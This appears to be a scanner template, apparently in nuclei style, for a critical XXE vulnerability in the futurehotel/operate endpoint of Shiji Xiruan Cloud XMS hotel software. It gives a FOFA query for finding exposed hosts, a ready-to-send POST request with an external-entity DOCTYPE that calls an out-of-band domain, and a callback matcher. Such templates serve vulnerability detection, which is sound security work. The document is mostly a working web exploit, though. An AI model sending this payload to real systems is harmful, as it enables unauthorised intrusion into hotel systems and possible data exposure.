## id: VEID-2024-0306
## name: 西软云XMS-futurehotel-operate接口存在XXE漏洞
## author: hack007x
## severity: critical
## tags: veid,xxe,veid2024
## description: XMS存在XXE漏洞
## fofa-query: app="shiji-西软云XMS"
## verification: true


POST /XopServerRS/rest/futurehotel/operate HTTP/1.1
Host: {{Hostname}}
User-Agent: {{random_ua}}
Connection: close
Content-Type: text/xml
Accept-Encoding: gzip

<!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://{{oob_domain}}"> %remote;]>


#@ oob: dns
#@ matcher: oob_received == true





# @VEIL-STAMP: d432cfe532fd1869184e984633b87f80588ef601febcac760c45fe3ad40e80db
